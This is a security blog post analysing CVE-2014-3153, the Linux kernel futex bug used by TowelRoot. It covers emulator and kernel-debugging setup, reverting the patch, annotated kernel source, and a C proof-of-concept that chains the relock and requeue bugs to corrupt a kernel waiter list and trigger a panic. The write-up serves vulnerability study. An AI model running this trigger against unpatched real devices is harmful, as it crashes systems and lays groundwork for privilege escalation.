The Futex Vulnerability

The Futex Vulnerability

Posted by Dany Zatuchna

Sep 11, 2014 4:12:00 AM

Here at Nativeflow, we take mobile security seriously. Naturally, the news of a new rooting mechanism aroused our curiosity and concern.

Our first instinct was to search the web for any additional information about this exploit and the vulnerability behind it. However, the scarcity of publicly available resources prompted us to perform our own analysis of the vulnerability and the exploit, and try to distill some elements which could be used in order to boost the security level we provide in our solutions.The results of this analysis, we decided, ought to be shared with the public.

Due to the complexity of the vulnerability and exploit, and the level of detail we had set to ourselves as a goal, this report will be divided into several posts, beginning with the vulnerability and the bugs which made it possible.

android-rooted 

A brief history

On May 26th, 2014, comex reported a potential bug in the Linux kernel futex mechanism. Later, as the bug was verified and logged as CVE-2014-3153geohot managed to leverage this vulnerability into a full blown privilege-escalation which he packaged as an Android application and dubbed TowelRoot. This TowelRoot essentially allowed one to root devices which up until that time were unrootable, such as the Samsung S5.

Vulnerability

The vulnerability is based on two logical bugs in the Linux kernel futex mechanism: one which allows releasing a pi-lock from userspace, and another which allows requeuing a lock twice.

For those unfamiliar with futex, futex stands for Fast Userspace muTEX, and I suggest reading about it in Wikipedia and here.

For the purpose of recreating and testing the vulnerability, I had set up an Android emulator. The following section will discuss the setting up a emulator for kernel debugging, if you already know how to do that or are only interested in the analysis, you may skip over to the "Relock bug" section.

Just one thing before starting, I'll be heavily referencing functions (by name) from the kernel, so you should be ready with the source files for the futex (futex.c, futex.h) and rtmutex (rtmutex.c, rtmutex_common.h) modules at hand.

Setting up the environment

Required software:

  1. Android studio. We'll need this for the android emulator and other supporting tools.
    Since I am using Linux as my setup, I will be picking the Linux package.
    After downloading the package, unpack it to your $ANDROID_HOME directory. You should then add it to your $PATH environment variable:
    ?
    1
    2
    $ export PATH=${PATH}:${ANDROID_HOME} /android-studio/sdk/tools
    $ export LD_LIBRARY_PATH=${ANDROID_HOME} /android-studio/sdk/tools/lib
  2. Git scm. Android's sources are hosted in a git repository.
  3. Cross-compilation toolchain:
    ?
    1
    2
    3
    $ cd $ANDROID_HOME
    $ git clone https: //android .googlesource.com /platform/prebuilt
    $ export PATH=${PATH}:${ANDROID_HOME} /prebuilt/linux-x86/toolchain/arm-eabi-4 .4.3 /bin

Compiling the Android kernel

The official guide to compiling the Android kernel is https://source.android.com/source/building-kernels.html, the following is based on that guide with some minor modifications:

  1. First, fetch a copy of the goldfish kernel source (according to the guide this is the kernel suitable for emulated environments):
    ?
    1
    2
    $ cd $ANDROID_HOME
    $ git clone https: //android .googlesource.com /kernel/goldfish .git
  2. We will be interested in version 3.4 of the kernel:
    ?
    1
    2
    $ cd ${ANDROID_HOME} /goldfish
    $ git checkout -t origin /android-goldfish-3 .4 -b goldfish 3.4
  3. And we also want to undo the fixes applied to the futex module. A quick glance at thehistory of kernel/futex.c will reveal that the last revision before the fixes following CVE-2014-3153 is e8c92d268b8b8feb550ca8d24a92c1c98ed65ace:
    ?
    1
    2
    $ cd ${ANDROID_HOME} /goldfish
    $ git checkout e8c92d268b8b8feb550ca8d24a92c1c98ed65ace kernel /futex .c
  4. We are now ready to start compiling the kernel. First we need to generate the build configuration:
    ?
    1
    2
    $ cd ${ANDROID_HOME} /goldfish
    $ make ARCH=arm SUBARCH=arm goldfish_armv7_defconfig
  5. Before we continue, we want to enable debug symbols. In ${ANDROID_HOME}/.config, set CONFIG_DEBUG_INFO parameter to y.
  6. And we're ready to make:
    ?
    1
    2
    3
    4
    5
    6
    $ cd ${ANDROID_HOME} /goldfish
    $ make ARCH=arm SUBARCH=arm CROSS_COMPILE=${ANDROID_HOME} /prebuilt/linux-x86/toolchain/arm-eabi-4 .4.3 /bin/arm-eabi-
    ...
    Compile the kernel with debug info (DEBUG_INFO) [Y /n/ ?] y
       Reduce debugging information (DEBUG_INFO_REDUCED) [N /y/ ?] (NEW) N
    ...

Running  the emulator

First we need to set up a machine:

?
1
2
3
4
5
6
7
8
9
$ android create avd --name debug --target android-19
Auto-selecting single ABI armeabi-v7a
Android 4.4.2 is a basic Android platform.
Do you wish to create a custom hardware profile [no]
Created AVD 'debug' based on Android 4.4.2, ARM (armeabi-v7a) processor,
with the following hardware config:
hw.lcd.density=240
hw.ramSize=512
vm.heapSize=48

And we're ready to run:

?
1
emulator-arm -verbose -debug init -show-kernel -kernel arch /arm/boot/zImage -avd debug -no-boot-anim -no-skin -no-audio -no-window -qemu -gdb tcp::1234

Here's a breakdown of all the switches:

?
1
2
3
4
5
6
7
8
9
10
11
$ emulator-arm                     \
>     -verbose                     \
>     -debug init                  \ # Enable debug messages
>     -show-kernel                 \ # Show kernel messages
>     -kernel arch /arm/boot/zImage \ # Path to the image of the kernel we just compiled
>     -avd debug                   \ # Use the android device setup named "debug"
>     -no-boot-anim                \ # We don't want-
>     -no-skin                     \ # the emulated machine-
>     -no-audio                    \ # to have any sort-
>     -no-window                   \ # of GUI
>     -qemu -gdb tcp::1234           # Notify qemu to set up a gdbserver on localhost:1234

We can now fire up gdb from another terminal, and attach to the gdbserver:

?
1
2
3
4
5
6
7
8
9
10
$ cd ${ANDROID_HOME} /goldfish
$ gdb vmlinux
...
Reading symbols from vmlinux... done .
(gdb) target remote :1234
Remote debugging using :1234
warning: Architecture rejected target-supplied description
0xc000dcc4 in sys_call_table () at arch /arm/kernel/entry-common .S:494
494             b       ret_slow_syscall
(gdb)

And we're ready to start working.

Relock bug

The core of futex_lock_pi is futex_lock_pi_atomic which attempts to acquire the lock at uaddrby an atomic cmpxchg of the contents of uaddr and the tid of the calling thread. Basically this (roughly) translates to:

?
1
2
3
if (*uaddr == 0) {
     *uaddr = tid; /* Lock acquired */
}

If the lock was acquired, the system call returns and the thread holds the lock. If not, then the system call blocks and waits for the lock to be released:

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
static int futex_lock_pi_atomic(u32 __user *uaddr, struct futex_hash_bucket *hb,
                 union futex_key *key,
                 struct futex_pi_state **ps,
                 struct task_struct *task, int set_waiters)
{
...
     /* Attempt a cmpxchg */
     if (unlikely(cmpxchg_futex_value_locked(&curval, uaddr, 0, newval)))
         return -EFAULT;
...
     /* Check that the cmpxchg succeeded in a 0->TID transition */
     if (unlikely(!curval))
         return 1;
...
}

The interesting point about the lock acquisition is that the only requisite is that the cmpxchg succeeds, which is completely unrelated to the acquisition state of the futex key related to that address. This means that a futex lock can be released by simply loading the lock's (userspace) address with 0.

This is more readily understood with an example. Consider the following test program (apologies in advance for the excessive verbosity):

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
#include <stdio.h>
#include <unistd.h>
#include <pthread.h>
  
#include "futaux.h"
  
int mutex = 0;
  
void * thread ( void *arg)
{
     int ret = 0;
     pid_t tid = gettid();
     printf ( "Entering thread[%d]\n" , tid);
     ret = futex_lock_pi(&mutex);
     if (ret) {
         perror ( "Thread could not aqcuire lock\n" );
         goto Wait_forever;
     }
     printf ( "Mutex acquired (mutex = %d)\n" , mutex);
Wait_forever:
     printf ( "Exiting thread[%d]\n" , tid);
     while (1) {
         sleep(1);
     }
}
  
int main( int argc, char *argv[])
{
     pthread_t t;
     printf ( "pid = %d\n" , getpid());
     printf ( "mutex = %d\n" , mutex);
     printf ( "Acquiring lock\n" );
     if (futex_lock_pi(&mutex)) {
         perror ( "Lock error" );
         return -1;
     }
     printf ( "Mutex acquired (mutex = %d)\n" , mutex);
     if (argc > 1) {
         printf ( "Releasing lock\n" );
         mutex = 0;
         printf ( "mutex = %d\n" , mutex);
     }
     if (pthread_create(&t, NULL, thread , NULL)) {
         perror ( "Could not create thread" );
         return -1;
     }
     while (1) {
         sleep(1);
     }
     return 0;
}

The output when running this on the emulator is:

?
1
2
3
4
5
6
7
$ adb shell /data/relock
pid = 394
mutex = 0
Acquiring lock
Mutex acquired (mutex = 394)
Entering thread[396]
^C

Now the same execution but with a manual release of the lock after it is acquired, and before the thread is spawned:

?
1
2
3
4
5
6
7
8
9
10
11
$ adb shell /data/relock a
pid = 453
mutex = 0
Acquiring lock
Mutex acquired (mutex = 453)
Releasing lock
mutex = 0
Entering thread[459]
Mutex acquired (mutex = 459)
Exiting thread[459]
^C

I'd like to add just a few words about why this is a bug. The entire purpose of the futex module is to manage lock/release/contention of locks on behalf of the user. The cmpxchg is performed as a sort of optimization in order to grab a lock quickly, however this does not absolve the kernel from managing the internal state of the lock. You may examine the fix for this bug by yourself to better understand what I meant.

Requeue bug

The syscall futex_wait_requeue_pi basically means "Take the lock uaddr1 and wait for uaddr2 to be available, once it is, take it and release uaddr1".

This call must be paired with futex_requeue. While futex_wait_requeue_pi just sets up the queued waiter, futex_requeue does the heavy lifting and adds that waiter to various waiting lists and takes care of waking it up.

For example, a normal usage would be:

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
/* Locks */
int lock1 = 0, lock2 = 0;
  
void thread_a( void *arg)
{
...
     int ret = futex_wait_requeue_pi(&lock1, &lock2);
     /* The system call will now block and waits for some other thread to acquire
     lock2 on its behalf and wake it up */
...
}
  
void thread_b( void *arg)
{
...
     int ret = futex_requeue(&lock1, &lock2, lock1);
     /* The kernel will now try to acquire lock2 for thread_a. On success, it will
     wake up the kernel thread, while on failure it will add a waiter object to a
     list of waiters waiting on lock2, and let the rtmutex module handle the wakeup */
...
}

From the above description, it's clear that each futex_wait_requeue_pi is paired with a singlefutex_requeue call, and there are measures implemented to prevent further calls with the same parameters.

To be more precise, if we call futex_wait_requeue_pi(&lock1, &lock2) and then futex_requeue(&lock1, &lock2, lock1), we can not call another futex_requeue(&lock1, &lock2, lock1) as it will return an error.

However, if we were to follow the first requeue with a futex_requeue(&lock2, &lock2, lock2)the code will not kick us out of the system call.

Combining the bugs

It's important to understand that there are two ways a sleeping futex_wait_requeue_pi can be woken, and both are (apparently) mutually exclusive:

  1. The lock was acquired during futex_proxy_trylock_atomic, in which case the sleeper is awoken and futex_requeue will return. End of story.
  2. The lock was acquired at the bottom of the futex_requeue (during the foreach clause) by rt_mutex_start_proxy_lock. Again, end of story.
    By the way, if rt_mutex_start_proxy_lock failed to acquire the lock immediately, it will just add a waiter to the list.

However, I must (and did) emphasize the "apparently" in the previous sentence. Because as it turns out, both relock and requeue bug allow us to both add a waiter, and wake up the sleeping kernel thread (while the waiter is still in the list).

Consider the following usage which takes advantage of both bugs:

requeue

  1. (thread-1futex_lock_pi(&B)
    This will make thread-1 acquire B, so that the next line will block
  2. (thread-2futex_wait_requeue_pi(&A, &B)
    Since B is owned (by thread-1), this call will set up the futex_q object with a pointer to a temporary rt_waiter object on the kernel's stack (that's Chekhov's gun right there).
  3. (thread-1futex_requeue(&A, &B)
    This will try to acquire B on behalf of thread-1, fail, and proceed to add the rt_waiter object in the futex_q object associated with the requeue to list of waiters on B.
    This is a rough outline of the code flow futex_requeue:
    ?
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    static int futex_requeue(u32 __user *uaddr1, unsigned int flags,
                  u32 __user *uaddr2, int nr_wake, int nr_requeue,
                  u32 *cmpval, int requeue_pi)
    {
    ...
         if (requeue_pi && (task_count - nr_wake < nr_requeue)) {
             /* Branch taken */
             ret = futex_proxy_trylock_atomic(uaddr2, hb1, hb2, &key1,
                     &key2, &pi_state, nr_requeue);
             /* The call will return 0 (the lock is occupied) */
    ...
             switch (ret) {
             case 0:
                 /* End of this clause */
                 break ;
    ...
             }
         }
     
         head1 = &hb1->chain;
         plist_for_each_entry_safe( this , next, head1, list) {
    ...
             /* requeue_pi == 1 */
             if (requeue_pi) {
                 atomic_inc(&pi_state->refcount);
                 this ->pi_state = pi_state;
                 ret = rt_mutex_start_proxy_lock(&pi_state->pi_mutex,
                                 this ->rt_waiter,
                                 this ->task, 1);
                 /* This call will return 0, as the lock was not taken
                  * so rt_waiter in futex_wait_requeue_pi's stack frame
                  * has been added to the list of waiters on the lock */
    ...
             }
    ...
         }
    ...
    }
  4. (thread-1) set B to 0, 
    Release B (relock bug)
  5. (thread-1futex_requeue(&B, &B).
    The requeue bug here allows us to issue this call, and survive long enough in the system call to reach futex_proxy_trylock_atomic, which will, again, attempt to acquire B for thread-1. This time, the call will succeed, as the lock is apparently free, and so the next time this that happens the kernel thread of thread-2 is woken.
    This time, the flow through futex_requeue is:
    ?
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    static int futex_requeue(u32 __user *uaddr1, unsigned int flags,
                  u32 __user *uaddr2, int nr_wake, int nr_requeue,
                  u32 *cmpval, int requeue_pi)
    {
    ...
         if (requeue_pi && (task_count - nr_wake < nr_requeue)) {
             /* Branch taken */
             ret = futex_proxy_trylock_atomic(uaddr2, hb1, hb2, &key1,
                     &key2, &pi_state, nr_requeue);
             /* The call will return 1 (the lock is free), and as a side
              * effect, the sleeping thread has been woken up */
    ...
             switch (ret) {
    ...
             case default :
                 goto out_unlock:
    ...
             }
         }
    out_unlock:
    ...
    }
  6. (thread-2) When the kernel thread is woken up, it checks the reason for the wake up, and then performs the appropriate clean up. However, because the normal flow was interfered, upon waking up, the execution flow is:
    ?
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    static inline
    void requeue_pi_wake_futex( struct futex_q *q, union futex_key *key,
                    struct futex_hash_bucket *hb)
    {
    ...
         q->rt_waiter = NULL;
    ...
         wake_up_state(q->task, TASK_NORMAL);
    }
     
    static int futex_wait_requeue_pi(u32 __user *uaddr, unsigned int flags,
                      u32 val, ktime_t *abs_time, u32 bitset,
                      u32 __user *uaddr2)
    {
         struct rt_mutex_waiter rt_waiter;
    ...
         q.rt_waiter = &rt_waiter;
    ...
         /* This is where the kernel thread goes to sleep
         ret = handle_early_requeue_pi_wakeup(hb, &q, &key2, to);
    ...
         /* When the thread is woken up via requeue_pi_wake_futex,
          * q->rt_waiter is NULL, so the following branch is taken */
         if (!q.rt_waiter) {
    ...
         } else {
    ...
             /* This is the branch NOT TAKEN, which would normally remove
              * rt_waiter from the waiter list */
             ret = rt_mutex_finish_proxy_lock(pi_mutex, to, &rt_waiter, 1);
    ...
         }
    ...
    }

The side effect of all of this is that an rt_waiter object which resides in the stack of futex_wait_requeue_pi has been added to some linked list (rt_mutex_start_proxy_lockin futex_requeue), and futex_wait_requeue_pi has returned without removing that waiter (rt_mutex_finish_proxy_lock).

We now have a linked list, where one of the nodes resides on the stack, but outside a stack-frame. Any system call executed following futex_wait_requeue_pi will overrun that node, corrupting the list.

However, if we set up the correct system call, with the correct values to run after futex_wait_requeue_pi returns, we can control that list to our advantage.

Here is an implementation of the bug combination:

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
#include <stdio.h>
#include <unistd.h>
#include <pthread.h>
  
#include "futaux.h"
#include "userlock.h"
  
int A = 0, B = 0;
  
volatile int invoke_futex_wait_requeue_pi = 0;
volatile pid_t thread_tid = -1;
  
void * thread ( void *arg)
{
     thread_tid = gettid();
     printf ( "[2]\n" );
     userlock_wait(&invoke_futex_wait_requeue_pi);
     futex_wait_requeue_pi(&A, &B);
     printf ( "Someone woke me up\n" );
     while (1) {
         sleep(1);
     }
}
  
int main( int argc, char *argv[])
{
     pthread_t t;
     int context_switch_count = 0;
  
     printf ( "[1]\n" );
  
     futex_lock_pi(&B);
  
     userlock_lock(&invoke_futex_wait_requeue_pi);
     pthread_create(&t, NULL, thread , NULL);
     /* Wait for the thread to be in a system call */
     while (thread_tid < 0) {
         usleep(10);
     }
     context_switch_count = get_voluntary_ctxt_switches(thread_tid);
     userlock_release(&invoke_futex_wait_requeue_pi);
     wait_for_thread_to_wait_in_kernel(thread_tid, context_switch_count);
  
     printf ( "[3]\n" );
     futex_requeue_pi(&A, &B, A);
  
     printf ( "[4]\n" );
     B = 0;
  
     printf ( "[5]\n" );
     futex_requeue_pi(&B, &B, B);
  
     while (1) {
         sleep(1);
     }
     return 0;
}

Notice I've added infinite sleeps in the end of all the threads. Their purpose is apparent as soon as we terminate the program. From the shell which runs the emulator, we can see we caused a kernel panic:

?
1
2
3
4
5
6
7
8
9
10
11
12
13
kernel BUG at kernel/rtmutex_common.h:74!
Internal error: Oops - BUG: 0 [#1] PREEMPT ARM
CPU: 0    Not tainted  (3.4.67-gd3ffcc7-dirty #8)
PC is at rt_mutex_slowunlock+0x54/0x130
LR is at rt_mutex_slowunlock+0x40/0x130
pc : [<c037bec0>]    lr : [<c037beac>]    psr: 20000093
sp : de2cdde0  ip : 00000017  fp : 00000001
r10: de0d3620  r9 : 00000014  r8 : de2b7b9c
r7 : de258608  r6 : de2cde40  r5 : 20000013  r4 : de2cc000
r3 : de2cc000  r2 : 00000002  r1 : 00000000  r0 : de2cde4c
Flags: nzCv  IRQs off  FIQs on  Mode SVC_32  ISA ARM  Segment user
Control: 10c53c7d  Table: 1e2c8059  DAC: 00000015
....

Examining the code:

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
/* rtmutex_common.h */
static inline struct rt_mutex_waiter *
rt_mutex_top_waiter( struct rt_mutex *lock)
{
     struct rt_mutex_waiter *w;
     w = plist_first_entry(&lock->wait_list, struct rt_mutex_waiter,
                    list_entry);
      /* The kernel fails on the following assertion, generating an
       * illegal instruction which causes a kernel panic */
     BUG_ON(w->lock != lock);
     return w;
}
  
/* rtmutex.c */
static void __sched
rt_mutex_slowunlock( struct rt_mutex *lock)
{
...
     wakeup_next_waiter(lock);
...
}
  
static void wakeup_next_waiter( struct rt_mutex *lock)
{
     struct rt_mutex_waiter *waiter;
...
     waiter = rt_mutex_top_waiter(lock);
...
}

We can see what happens here, when the process was terminated (and with it the threads), the kernel went and tried to release all the locks, and woke up the waiters which contended on them. However, the lock has a waiter in its list, but the waiter object is on a thread stack which must have been cleared or re-appropriated, and so, clearly, the waiter's lock object does not match the lock to which the dangling waiter belongs.

Some minor things before wrapping up. First, as you may have noticed, I've listed some custom headers in the code snippets, those mainly contain some convenience functions like syscall wrappers (with a reduced number of parameters for convenience) and some auxiliary functions to help with syncing the vairous threads. All this may be found in our github repository.

Next time we'll see how we can leverage both bugs in order to achieve a limited form of user-to-kernel read/write.

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值